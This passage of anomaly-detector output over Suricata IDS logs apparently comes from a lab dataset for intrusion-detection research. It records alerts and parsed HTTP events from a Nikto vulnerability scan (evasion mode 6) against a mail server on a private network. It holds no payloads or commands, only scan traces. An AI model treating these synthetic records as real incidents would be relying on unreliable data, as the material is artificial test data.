"/parser/model/time": 1583349514.224312, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1783781506312318,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.shtml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.shtml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.shtml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.shtml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": 
null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46838, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1783781506312318,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1783781506312318, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.224312+0000\",\"flow_id\":1783781506312318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.226910 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46840 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22691, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46840, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.226910 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46840 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.shm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.227159+0000\",\"flow_id\":1061372302094328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.227159, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1061372302094328,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.shm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.shm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.shm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.shm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46840, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1061372302094328,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1061372302094328, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.227159+0000\",\"flow_id\":1061372302094328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.229413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46842 -> 192.168.10.154:80", "/parser/model/time": 1583349514.229413, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46842, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.229413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46842 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.btr", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.229692+0000\",\"flow_id\":1638959504063480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.229692, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1638959504063480,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.btr\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.btr\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.btr", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.btr", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46842, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1638959504063480,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1638959504063480, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.229692+0000\",\"flow_id\":1638959504063480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.231549 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46844 -> 192.168.10.154:80", "/parser/model/time": 1583349514.231549, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
